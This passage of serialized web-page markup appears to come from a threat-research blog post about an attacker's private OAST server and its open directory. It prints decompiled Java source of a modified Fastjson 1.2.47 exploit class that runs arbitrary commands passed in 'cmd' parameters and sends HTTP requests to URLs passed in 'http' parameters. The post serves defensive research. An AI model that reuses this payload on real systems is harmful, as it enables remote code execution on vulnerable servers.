7029,19057],{"class":9173},[1373,27031,27032],{"class":1375,"line":18605},[1373,27033,26366],{"class":1383},[1373,27035,27036,27038,27040,27042,27044],{"class":1375,"line":18630},[1373,27037,19050],{"class":9152},[1373,27039,26399],{"class":9155},[1373,27041,183],{"class":9152},[1373,27043,4606],{"class":1383},[1373,27045,4765],{"class":1383},[1373,27047,27048,27050,27052,27054,27056,27058,27060,27062],{"class":1375,"line":18651},[1373,27049,26357],{"class":9152},[1373,27051,26412],{"class":9165},[1373,27053,183],{"class":9152},[1373,27055,4606],{"class":1383},[1373,27057,4883],{"class":9173},[1373,27059,26421],{"class":9176},[1373,27061,183],{"class":9173},[1373,27063,9062],{"class":1383},[1373,27065,27066,27068,27070,27072,27074,27076,27078,27080],{"class":1375,"line":18674},[1373,27067,26357],{"class":9152},[1373,27069,26432],{"class":9165},[1373,27071,183],{"class":9152},[1373,27073,4606],{"class":1383},[1373,27075,4883],{"class":9173},[1373,27077,26441],{"class":9176},[1373,27079,183],{"class":9173},[1373,27081,9062],{"class":1383},[1373,27083,27084,27086,27088,27090,27092,27094,27096],{"class":1375,"line":18694},[1373,27085,26357],{"class":9152},[1373,27087,26452],{"class":9165},[1373,27089,183],{"class":9152},[1373,27091,4606],{"class":1383},[1373,27093,4883],{"class":9173},[1373,27095,26461],{"class":9176},[1373,27097,19057],{"class":9173},[1373,27099,27100],{"class":1375,"line":18720},[1373,27101,26468],{"class":1383},[1373,27103,27104,27106,27108,27110,27112],{"class":1375,"line":18737},[1373,27105,19050],{"class":9152},[1373,27107,26475],{"class":9155},[1373,27109,183],{"class":9152},[1373,27111,4606],{"class":1383},[1373,27113,26352],{"class":1383},[1373,27115,27116,27118,27120],{"class":1375,"line":18757},[1373,27117,26357],{"class":9173},[1373,27119,26488],{"class":9176},[1373,27121,19057],{"class":9173},[1373,27123,27124],{"class":1375,"line":18773},[1373,27125,26366],{"class":1383},[1373,27127,27128,27130,27132,27134,27136,27138,27141],{"class":1375,
"line":18778},[1373,27129,19050],{"class":9152},[1373,27131,26501],{"class":9155},[1373,27133,183],{"class":9152},[1373,27135,4606],{"class":1383},[1373,27137,4883],{"class":9173},[1373,27139,27140],{"class":9176},"2025-11-25T09:44:13.709554907Z",[1373,27142,19057],{"class":9173},[1373,27144,27145],{"class":1375,"line":18790},[1373,27146,27147],{"class":1383},"  }\n",[1373,27149,27150],{"class":1375,"line":18795},[1373,27151,7103],{"class":1383},[18,27153,27154,27155,27157],{},"Although ",[886,27156,26137],{}," behaves like a standard OAST endpoint, it also exposes additional material that gives more insight into the actor’s tooling. In particular, an open directory on port 9000 hosts a Java class file associated with Fastjson 1.2.47 exploitation (not tied to a specific CVE, but we are working to resolve that).",[18,27159,27160],{},[68,27161],{":width":10862,"alt":27162,"src":27163},"Open directory","\u002Fblog\u002Fmystery-oast\u002Fopendir.png",[18,27165,27166,27167,27172,27173,27178,27179,27182,27183,27185,27186,27188],{},"The file, ",[47,27168,27171],{"href":27169,"rel":27170},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F98d6d3e76949d8357a769fc01c3aa6a8db4d0ee55bb1715a0b8ba0fb3498768e\u002Fdetails",[51],"TouchFile.class",", is documented in Vulhub’s Fastjson 1.2.47 exploitation ",[47,27174,27177],{"href":27175,"rel":27176},"https:\u002F\u002Fgithub.com\u002Fvulhub\u002Fvulhub\u002Ftree\u002Fmaster\u002Ffastjson\u002F1.2.47-rce#vulnerability-reproduction",[51],"example",", but the Vulhub version is short and only touches a file. This attacker’s implementation keeps the same default behavior (",[886,27180,27181],{},"touch \u002Ftmp\u002Fsuccess3125",") but extends it. If no parameters are provided, it runs the default command. 
If ",[886,27184,17653],{}," parameters are present, it executes those commands instead, and if ",[886,27187,6277],{}," parameters are present, it makes outbound HTTP requests to those URLs.",[18,27190,27191],{},"A trimmed version of the decompiled class looks like this:",[1354,27193,27197],{"className":27194,"code":27195,"language":27196,"meta":219,"style":219},"language-java shiki shiki-themes material-theme-lighter github-light github-dark monokai","public class TouchFile {\n  static {\n    try {\n      String defaultCmd = \"touch \u002Ftmp\u002Fsuccess3125\";\n      List \u003C String > cmds = new ArrayList \u003C > ();\n      List \u003C String > urls = new ArrayList \u003C > ();\n\n      URL codebase = TouchFile.class.getProtectionDomain()\n        .getCodeSource()\n        .getLocation();\n      if (codebase != null) {\n        String s = codebase.toString();\n        int idx = s.indexOf(\"?\");\n        if (idx != -1 && idx \u003C s.length() - 1) {\n          Map \u003C String, List \u003C String >> params = new HashMap \u003C > ();\n          String query = s.substring(idx + 1);\n          for (String part: query.split(\"&\")) {\n            String[] kv = part.split(\"=\", 2);\n            if (kv.length == 2) {\n              params.computeIfAbsent(kv[0], k -> new ArrayList \u003C > ())\n                .add(URLDecoder.decode(kv[1], \"UTF-8\"));\n            }\n          }\n          if (params.containsKey(\"cmd\")) {\n            cmds.addAll(params.get(\"cmd\"));\n          }\n          if (params.containsKey(\"http\")) {\n            urls.addAll(params.get(\"http\"));\n          }\n        }\n      }\n\n      if (cmds.isEmpty()) {\n        cmds.add(defaultCmd);\n      }\n\n      for (String cmd: cmds) {\n        Process p = Runtime.getRuntime().exec(cmd.split(\" \"));\n        p.waitFor();\n      }\n\n      for (String u: urls) {\n        HttpURLConnection c = (HttpURLConnection) new URL(u).openConnection();\n        c.setRequestMethod(\"GET\");\n        
c.getResponseCode();\n      }\n    } catch (Exception e) {\n      e.printStackTrace(System.err);\n    }\n  }\n}\n","java",[886,27198,27199,27211,27218,27224,27243,27273,27298,27302,27327,27337,27346,27364,27384,27412,27451,27488,27515,27551,27583,27605,27642,27679,27683,27688,27714,27743,27747,27771,27798,27802,27806,27811,27815,27834,27850,27854,27858,27879,27918,27930,27934,27938,27958,27993,28013,28024,28028,28047,28068,28072,28076],{"__ignoreMap":219},[1373,27200,27201,27203,27206,27209],{"class":1375,"line":1376},[1373,27202,15019],{"class":4652},[1373,27204,27205],{"class":4652}," class",[1373,27207,27208],{"class":14938}," TouchFile",[1373,27210,4765],{"class":1383},[1373,27212,27213,27216],{"class":1375,"line":220},[1373,27214,27215],{"class":4652},"  static",[1373,27217,4765],{"class":1383},[1373,27219,27220,27222],{"class":1375,"line":1266},[1373,27221,11752],{"class":4636},[1373,27223,4765],{"class":1383},[1373,27225,27226,27230,27233,27235,27237,27239,27241],{"class":1375,"line":1852},[1373,27227,27229],{"class":27228},"syw9h","      String",[1373,27231,27232],{"class":4640}," defaultCmd ",[1373,27234,5417],{"class":1397},[1373,27236,4883],{"class":1387},[1373,27238,27181],{"class":1391},[1373,27240,183],{"class":1387},[1373,27242,4912],{"class":1383},[1373,27244,27245,27248,27251,27254,27256,27259,27261,27263,27266,27268,27270],{"class":1375,"line":4692},[1373,27246,27247],{"class":27228},"      List",[1373,27249,27250],{"class":1383}," \u003C",[1373,27252,27253],{"class":7293}," String",[1373,27255,11741],{"class":1383},[1373,27257,27258],{"class":4640}," cmds ",[1373,27260,5417],{"class":1397},[1373,27262,15283],{"class":4636},[1373,27264,27265],{"class":27228}," ArrayList",[1373,27267,27250],{"class":1383},[1373,27269,11741],{"class":1383},[1373,27271,27272],{"class":1383}," 
();\n",[1373,27274,27275,27277,27279,27281,27283,27286,27288,27290,27292,27294,27296],{"class":1375,"line":4724},[1373,27276,27247],{"class":27228},[1373,27278,27250],{"class":1383},[1373,27280,27253],{"class":7293},[1373,27282,11741],{"class":1383},[1373,27284,27285],{"class":4640}," urls ",[1373,27287,5417],{"class":1397},[1373,27289,15283],{"class":4636},[1373,27291,27265],{"class":27228},[1373,27293,27250],{"class":1383},[1373,27295,11741],{"class":1383},[1373,27297,27272],{"class":1383},[1373,27299,27300],{"class":1375,"line":4756},[1373,27301,6520],{"emptyLinePlaceholder":237},[1373,27303,27304,27307,27310,27312,27314,27316,27319,27321,27324],{"class":1375,"line":4768},[1373,27305,27306],{"class":27228},"      URL",[1373,27308,27309],{"class":4640}," codebase ",[1373,27311,5417],{"class":1397},[1373,27313,27208],{"class":4640},[1373,27315,59],{"class":1383},[1373,27317,27318],{"class":4640},"class",[1373,27320,59],{"class":1383},[1373,27322,27323],{"class":7297},"getProtectionDomain",[1373,27325,27326],{"class":1383},"()\n",[1373,27328,27329,27332,27335],{"class":1375,"line":4792},[1373,27330,27331],{"class":1383},"        .",[1373,27333,27334],{"class":7297},"getCodeSource",[1373,27336,27326],{"class":1383},[1373,27338,27339,27341,27344],{"class":1375,"line":4798},[1373,27340,27331],{"class":1383},[1373,27342,27343],{"class":7297},"getLocation",[1373,27345,15603],{"class":1383},[1373,27347,27348,27351,27353,27356,27358,27360,27362],{"class":1375,"line":4806},[1373,27349,27350],{"class":4636},"      if",[1373,27352,4641],{"class":1383},[1373,27354,27355],{"class":4640},"codebase ",[1373,27357,15677],{"class":1397},[1373,27359,15680],{"class":7054},[1373,27361,2230],{"class":1383},[1373,27363,4765],{"class":1383},[1373,27365,27366,27369,27372,27374,27377,27379,27382],{"class":1375,"line":4817},[1373,27367,27368],{"class":27228},"        String",[1373,27370,27371],{"class":4640}," s ",[1373,27373,5417],{"class":1397},[1373,27375,27376],{"class":4640}," 
codebase",[1373,27378,59],{"class":1383},[1373,27380,27381],{"class":7297},"toString",[1373,27383,15603],{"class":1383},[1373,27385,27386,27389,27392,27394,27397,27399,27402,27404,27406,27408,27410],{"class":1375,"line":4825},[1373,27387,27388],{"class":7293},"        int",[1373,27390,27391],{"class":4640}," idx ",[1373,27393,5417],{"class":1397},[1373,27395,27396],{"class":4640}," s",[1373,27398,59],{"class":1383},[1373,27400,27401],{"class":7297},"indexOf",[1373,27403,1384],{"class":1383},[1373,27405,183],{"class":1387},[1373,27407,13993],{"class":1391},[1373,27409,183],{"class":1387},[1373,27411,4680],{"class":1383},[1373,27413,27414,27416,27418,27421,27423,27426,27428,27430,27432,27434,27436,27438,27441,27443,27445,27447,27449],{"class":1375,"line":4835},[1373,27415,9773],{"class":4636},[1373,27417,4641],{"class":1383},[1373,27419,27420],{"class":4640},"idx ",[1373,27422,15677],{"class":1397},[1373,27424,27425],{"class":1397}," -",[1373,27427,467],{"class":5467},[1373,27429,16622],{"class":1397},[1373,27431,27391],{"class":4640},[1373,27433,11852],{"class":1397},[1373,27435,27396],{"class":4640},[1373,27437,59],{"class":1383},[1373,27439,27440],{"class":7297},"length",[1373,27442,7514],{"class":1383},[1373,27444,27425],{"class":1397},[1373,27446,5468],{"class":5467},[1373,27448,2230],{"class":1383},[1373,27450,4765],{"class":1383},[1373,27452,27453,27456,27458,27460,27462,27465,27467,27469,27472,27475,27477,27479,27482,27484,27486],{"class":1375,"line":4843},[1373,27454,27455],{"class":27228},"          Map",[1373,27457,27250],{"class":1383},[1373,27459,27253],{"class":7293},[1373,27461,5437],{"class":1383},[1373,27463,27464],{"class":27228}," List",[1373,27466,27250],{"class":1383},[1373,27468,27253],{"class":7293},[1373,27470,27471],{"class":1383}," >>",[1373,27473,27474],{"class":4640}," params ",[1373,27476,5417],{"class":1397},[1373,27478,15283],{"class":4636},[1373,27480,27481],{"class":27228}," 
HashMap",[1373,27483,27250],{"class":1383},[1373,27485,11741],{"class":1383},[1373,27487,27272],{"class":1383},[1373,27489,27490,27493,27496,27498,27500,27502,27505,27507,27509,27511,27513],{"class":1375,"line":4849},[1373,27491,27492],{"class":27228},"          String",[1373,27494,27495],{"class":4640}," query ",[1373,27497,5417],{"class":1397},[1373,27499,27396],{"class":4640},[1373,27501,59],{"class":1383},[1373,27503,27504],{"class":7297},"substring",[1373,27506,1384],{"class":1383},[1373,27508,27420],{"class":4640},[1373,27510,15448],{"class":1397},[1373,27512,5468],{"class":5467},[1373,27514,4680],{"class":1383},[1373,27516,27517,27520,27522,27525,27528,27530,27533,27535,27538,27540,27542,27544,27546,27549],{"class":1375,"line":4877},[1373,27518,27519],{"class":4636},"          for",[1373,27521,4641],{"class":1383},[1373,27523,27524],{"class":27228},"String",[1373,27526,27527],{"class":4640}," part",[1373,27529,4606],{"class":4636},[1373,27531,27532],{"class":4640}," query",[1373,27534,59],{"class":1383},[1373,27536,27537],{"class":7297},"split",[1373,27539,1384],{"class":1383},[1373,27541,183],{"class":1387},[1373,27543,7218],{"class":1391},[1373,27545,183],{"class":1387},[1373,27547,27548],{"class":1383},"))",[1373,27550,4765],{"class":1383},[1373,27552,27553,27556,27558,27561,27563,27565,27567,27569,27571,27573,27575,27577,27579,27581],{"class":1375,"line":4915},[1373,27554,27555],{"class":7293},"            String",[1373,27557,7124],{"class":1383},[1373,27559,27560],{"class":4640}," kv 
",[1373,27562,5417],{"class":1397},[1373,27564,27527],{"class":4640},[1373,27566,59],{"class":1383},[1373,27568,27537],{"class":7297},[1373,27570,1384],{"class":1383},[1373,27572,183],{"class":1387},[1373,27574,5417],{"class":1391},[1373,27576,183],{"class":1387},[1373,27578,5437],{"class":1383},[1373,27580,5499],{"class":5467},[1373,27582,4680],{"class":1383},[1373,27584,27585,27587,27589,27592,27594,27597,27599,27601,27603],{"class":1375,"line":4931},[1373,27586,9793],{"class":4636},[1373,27588,4641],{"class":1383},[1373,27590,27591],{"class":4640},"kv",[1373,27593,59],{"class":1383},[1373,27595,27596],{"class":4640},"length ",[1373,27598,15920],{"class":1397},[1373,27600,5499],{"class":5467},[1373,27602,2230],{"class":1383},[1373,27604,4765],{"class":1383},[1373,27606,27607,27610,27612,27615,27617,27619,27621,27623,27626,27629,27631,27633,27635,27637,27639],{"class":1375,"line":4947},[1373,27608,27609],{"class":4640},"              params",[1373,27611,59],{"class":1383},[1373,27613,27614],{"class":7297},"computeIfAbsent",[1373,27616,1384],{"class":1383},[1373,27618,27591],{"class":4640},[1373,27620,7035],{"class":1383},[1373,27622,445],{"class":5467},[1373,27624,27625],{"class":1383},"],",[1373,27627,27628],{"class":4640}," k ",[1373,27630,4667],{"class":7293},[1373,27632,15283],{"class":4636},[1373,27634,27265],{"class":27228},[1373,27636,27250],{"class":1383},[1373,27638,11741],{"class":1383},[1373,27640,27641],{"class":1383}," ())\n",[1373,27643,27644,27647,27650,27652,27655,27657,27660,27662,27664,27666,27668,27670,27672,27675,27677],{"class":1375,"line":4952},[1373,27645,27646],{"class":1383},"                
.",[1373,27648,27649],{"class":7297},"add",[1373,27651,1384],{"class":1383},[1373,27653,27654],{"class":4640},"URLDecoder",[1373,27656,59],{"class":1383},[1373,27658,27659],{"class":7297},"decode",[1373,27661,1384],{"class":1383},[1373,27663,27591],{"class":4640},[1373,27665,7035],{"class":1383},[1373,27667,467],{"class":5467},[1373,27669,27625],{"class":1383},[1373,27671,4883],{"class":1387},[1373,27673,27674],{"class":1391},"UTF-8",[1373,27676,183],{"class":1387},[1373,27678,1413],{"class":1383},[1373,27680,27681],{"class":1375,"line":6776},[1373,27682,9832],{"class":1383},[1373,27684,27685],{"class":1375,"line":6781},[1373,27686,27687],{"class":1383},"          }\n",[1373,27689,27690,27693,27695,27697,27699,27702,27704,27706,27708,27710,27712],{"class":1375,"line":7524},[1373,27691,27692],{"class":4636},"          if",[1373,27694,4641],{"class":1383},[1373,27696,7627],{"class":4640},[1373,27698,59],{"class":1383},[1373,27700,27701],{"class":7297},"containsKey",[1373,27703,1384],{"class":1383},[1373,27705,183],{"class":1387},[1373,27707,17653],{"class":1391},[1373,27709,183],{"class":1387},[1373,27711,27548],{"class":1383},[1373,27713,4765],{"class":1383},[1373,27715,27716,27719,27721,27724,27726,27728,27730,27733,27735,27737,27739,27741],{"class":1375,"line":7530},[1373,27717,27718],{"class":4640},"            
cmds",[1373,27720,59],{"class":1383},[1373,27722,27723],{"class":7297},"addAll",[1373,27725,1384],{"class":1383},[1373,27727,7627],{"class":4640},[1373,27729,59],{"class":1383},[1373,27731,27732],{"class":7297},"get",[1373,27734,1384],{"class":1383},[1373,27736,183],{"class":1387},[1373,27738,17653],{"class":1391},[1373,27740,183],{"class":1387},[1373,27742,1413],{"class":1383},[1373,27744,27745],{"class":1375,"line":7546},[1373,27746,27687],{"class":1383},[1373,27748,27749,27751,27753,27755,27757,27759,27761,27763,27765,27767,27769],{"class":1375,"line":7571},[1373,27750,27692],{"class":4636},[1373,27752,4641],{"class":1383},[1373,27754,7627],{"class":4640},[1373,27756,59],{"class":1383},[1373,27758,27701],{"class":7297},[1373,27760,1384],{"class":1383},[1373,27762,183],{"class":1387},[1373,27764,6277],{"class":1391},[1373,27766,183],{"class":1387},[1373,27768,27548],{"class":1383},[1373,27770,4765],{"class":1383},[1373,27772,27773,27776,27778,27780,27782,27784,27786,27788,27790,27792,27794,27796],{"class":1375,"line":7598},[1373,27774,27775],{"class":4640},"            urls",[1373,27777,59],{"class":1383},[1373,27779,27723],{"class":7297},[1373,27781,1384],{"class":1383},[1373,27783,7627],{"class":4640},[1373,27785,59],{"class":1383},[1373,27787,27732],{"class":7297},[1373,27789,1384],{"class":1383},[1373,27791,183],{"class":1387},[1373,27793,6277],{"class":1391},[1373,27795,183],{"class":1387},[1373,27797,1413],{"class":1383},[1373,27799,27800],{"class":1375,"line":7615},[1373,27801,27687],{"class":1383},[1373,27803,27804],{"class":1375,"line":7635},[1373,27805,9861],{"class":1383},[1373,27807,27808],{"class":1375,"line":7640},[1373,27809,27810],{"class":1383},"      
}\n",[1373,27812,27813],{"class":1375,"line":7648},[1373,27814,6520],{"emptyLinePlaceholder":237},[1373,27816,27817,27819,27821,27824,27826,27829,27832],{"class":1375,"line":7672},[1373,27818,27350],{"class":4636},[1373,27820,4641],{"class":1383},[1373,27822,27823],{"class":4640},"cmds",[1373,27825,59],{"class":1383},[1373,27827,27828],{"class":7297},"isEmpty",[1373,27830,27831],{"class":1383},"())",[1373,27833,4765],{"class":1383},[1373,27835,27836,27839,27841,27843,27845,27848],{"class":1375,"line":7688},[1373,27837,27838],{"class":4640},"        cmds",[1373,27840,59],{"class":1383},[1373,27842,27649],{"class":7297},[1373,27844,1384],{"class":1383},[1373,27846,27847],{"class":4640},"defaultCmd",[1373,27849,4680],{"class":1383},[1373,27851,27852],{"class":1375,"line":7709},[1373,27853,27810],{"class":1383},[1373,27855,27856],{"class":1375,"line":7714},[1373,27857,6520],{"emptyLinePlaceholder":237},[1373,27859,27860,27863,27865,27867,27870,27872,27875,27877],{"class":1375,"line":7722},[1373,27861,27862],{"class":4636},"      for",[1373,27864,4641],{"class":1383},[1373,27866,27524],{"class":27228},[1373,27868,27869],{"class":4640}," cmd",[1373,27871,4606],{"class":4636},[1373,27873,27874],{"class":4640}," cmds",[1373,27876,2230],{"class":1383},[1373,27878,4765],{"class":1383},[1373,27880,27881,27884,27887,27889,27892,27894,27897,27899,27902,27904,27906,27908,27910,27912,27914,27916],{"class":1375,"line":9903},[1373,27882,27883],{"class":27228},"        Process",[1373,27885,27886],{"class":4640}," p ",[1373,27888,5417],{"class":1397},[1373,27890,27891],{"class":4640}," 
Runtime",[1373,27893,59],{"class":1383},[1373,27895,27896],{"class":7297},"getRuntime",[1373,27898,16355],{"class":1383},[1373,27900,27901],{"class":7297},"exec",[1373,27903,1384],{"class":1383},[1373,27905,17653],{"class":4640},[1373,27907,59],{"class":1383},[1373,27909,27537],{"class":7297},[1373,27911,1384],{"class":1383},[1373,27913,183],{"class":1387},[1373,27915,4883],{"class":1387},[1373,27917,1413],{"class":1383},[1373,27919,27920,27923,27925,27928],{"class":1375,"line":9908},[1373,27921,27922],{"class":4640},"        p",[1373,27924,59],{"class":1383},[1373,27926,27927],{"class":7297},"waitFor",[1373,27929,15603],{"class":1383},[1373,27931,27932],{"class":1375,"line":9913},[1373,27933,27810],{"class":1383},[1373,27935,27936],{"class":1375,"line":9932},[1373,27937,6520],{"emptyLinePlaceholder":237},[1373,27939,27940,27942,27944,27946,27949,27951,27954,27956],{"class":1375,"line":9937},[1373,27941,27862],{"class":4636},[1373,27943,4641],{"class":1383},[1373,27945,27524],{"class":27228},[1373,27947,27948],{"class":4640}," u",[1373,27950,4606],{"class":4636},[1373,27952,27953],{"class":4640}," urls",[1373,27955,2230],{"class":1383},[1373,27957,4765],{"class":1383},[1373,27959,27960,27963,27966,27968,27970,27973,27975,27977,27980,27982,27985,27988,27991],{"class":1375,"line":9957},[1373,27961,27962],{"class":27228},"        HttpURLConnection",[1373,27964,27965],{"class":4640}," c ",[1373,27967,5417],{"class":1397},[1373,27969,4641],{"class":1383},[1373,27971,27972],{"class":4640},"HttpURLConnection",[1373,27974,2230],{"class":1383},[1373,27976,15283],{"class":4636},[1373,27978,27979],{"class":7297}," URL",[1373,27981,1384],{"class":1383},[1373,27983,27984],{"class":4640},"u",[1373,27986,27987],{"class":1383},").",[1373,27989,27990],{"class":7297},"openConnection",[1373,27992,15603],{"class":1383},[1373,27994,27995,27998,28000,28003,28005,28007,28009,28011],{"class":1375,"line":9962},[1373,27996,27997],{"class":4640},"        
c",[1373,27999,59],{"class":1383},[1373,28001,28002],{"class":7297},"setRequestMethod",[1373,28004,1384],{"class":1383},[1373,28006,183],{"class":1387},[1373,28008,6284],{"class":1391},[1373,28010,183],{"class":1387},[1373,28012,4680],{"class":1383},[1373,28014,28015,28017,28019,28022],{"class":1375,"line":15955},[1373,28016,27997],{"class":4640},[1373,28018,59],{"class":1383},[1373,28020,28021],{"class":7297},"getResponseCode",[1373,28023,15603],{"class":1383},[1373,28025,28026],{"class":1375,"line":16030},[1373,28027,27810],{"class":1383},[1373,28029,28030,28033,28036,28038,28040,28043,28045],{"class":1375,"line":16035},[1373,28031,28032],{"class":1383},"    }",[1373,28034,28035],{"class":4636}," catch",[1373,28037,4641],{"class":1383},[1373,28039,18887],{"class":27228},[1373,28041,28042],{"class":19096}," e",[1373,28044,2230],{"class":1383},[1373,28046,4765],{"class":1383},[1373,28048,28049,28052,28054,28057,28059,28061,28063,28066],{"class":1375,"line":16083},[1373,28050,28051],{"class":4640},"      e",[1373,28053,59],{"class":1383},[1373,28055,28056],{"class":7297},"printStackTrace",[1373,28058,1384],{"class":1383},[1373,28060,16247],{"class":4640},[1373,28062,59],{"class":1383},[1373,28064,28065],{"class":4640},"err",[1373,28067,4680],{"class":1383},[1373,28069,28070],{"class":1375,"line":16098},[1373,28071,4795],{"class":1383},[1373,28073,28074],{"class":1375,"line":16103},[1373,28075,27147],{"class":1383},[1373,28077,28078],{"class":1375,"line":16147},[1373,28079,1855],{"class":1383},[18,28081,28082],{},"The behavior of TouchFile.class illustrates how the attacker adapts publicly available tooling to their needs. 
It is a small detail, but it shows that the actor is willing to modify common exploit components rather than rely on them exactly as published.",[1920,28084,1903],{"id":1902},[18,28086,28087],{},"Taken together, the use of a private OAST host, a mix of outdated and current Nuclei templates, and a custom Fastjson payload indicates an operation with more structure than typical exploit spraying. The long-lived OAST infrastructure and the consistent regional focus suggest an actor that is running a sustained scanning effort rather than short-lived opportunistic probes.",[18,28089,28090],{},"Regardless of attribution, this activity highlights a broader trend. Attackers continue to take off-the-shelf tooling like Nuclei and spray exploits across the internet to quickly identify and compromise vulnerable assets. They show little concern for the indicators or compromised accounts these tools leave behind, as long as the approach helps them find targets efficiently. The only way to protect yourself from such attackers is to monitor your network, understand what is exposed, and outpace adversaries.",[1920,28092,202],{"id":201},[18,28094,28095,28096,982,28099,28102,28103,982,28108,59],{},"VulnCheck’s research team tracks attacker infrastructure and exploit activity using our ",[47,28097,283],{"href":281,"rel":28098},[51],[47,28100,1251],{"href":1249,"rel":28101},[51]," datasets. Investigations like this one into attacker-run OAST services and structured scanning workflows are part of our ongoing effort to highlight real-world exploitation trends. 
For more research like this check out our blogs, ",[1131,28104,28105],{},[47,28106,10801],{"href":10796,"rel":28107},[51],[1131,28109,28110],{},[47,28111,24026],{"href":24024,"rel":28112},[51],[18,28114,1228,28115,1234,28118,1240,28121,1246,28124,1246,28127,1255,28130,1260],{},[47,28116,1233],{"href":10806,"rel":28117},[51],[47,28119,1239],{"href":1237,"rel":28120},[51],[47,28122,1245],{"href":1243,"rel":28123},[51],[47,28125,1251],{"href":1249,"rel":28126},[51],[47,28128,283],{"href":281,"rel":28129},[51],[47,28131,216],{"href":1258,"rel":28132},[51],[2901,28134,28135],{},"html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html .light .shiki span {color: 
var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sTNss, html code.shiki 
.sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .syw9h, html code.shiki .syw9h{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#24292E;--shiki-default-font-style:inherit;--shiki-dark:#E1E4E8;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sQgqH, html code.shiki 
